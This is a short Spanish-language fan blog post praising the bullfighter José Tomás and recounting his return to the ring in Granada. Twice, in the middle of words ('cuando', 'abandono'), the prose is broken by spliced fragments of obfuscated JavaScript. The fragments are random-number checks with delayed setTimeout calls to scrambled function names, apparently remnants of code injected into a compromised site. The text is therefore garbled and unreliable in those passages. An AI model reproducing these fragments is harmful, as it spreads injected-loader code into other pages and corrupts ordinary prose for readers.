JOSE TOMAS

José Tomàs no habla, no escribe. En cambio, muchos hablan de él o escriben sobre él. Su vuelta en Granada, 639 días después de su encerrona nimena, fue una miles y miles veces comentado. Algunos evocaron su voltereta sin consecuencia, dicen sobre un error de becerrista. ¿ Cuántas veces vemos en una temporada taurina, los toreros dar la espalda al toro e ir a por la espada?

En Granada, el toro pesado y poderoso (578 kg), de 5 años, que jamás humilló, brotó, lo enganchó… Usted conoce la continuación.

Otros hasta se atreven a escribir que dirige sus volteretas. Otros todavía le piden hacer una temporada completa.

Queda imperturbable y se calla. Él torea donde quiere, cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando quiere. Libre a los aficionados de ir o de no ir a verlo torear.

En Granada, José Tomàs lleno la plaza y ni siquiera el día de su corrida.

En Granada, José Tomàs destiló este impresión extraña e indefinible que le acompaña a cada una de sus corridas.

José Tomàs me revolvió en Madrid el 5 de junio de 2008, me deslumbró a Nîmes el 16 de septiembre de 2012.

En Granada, encontré al mismo José Tomàs, sus pequeños pasos, el abandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andono de su cuerpo, la economía de los gestos.

Un personaje fuera de lo normal y fuera de epoca.

¡ Único y fascinante!

tomasNetB

Comments are closed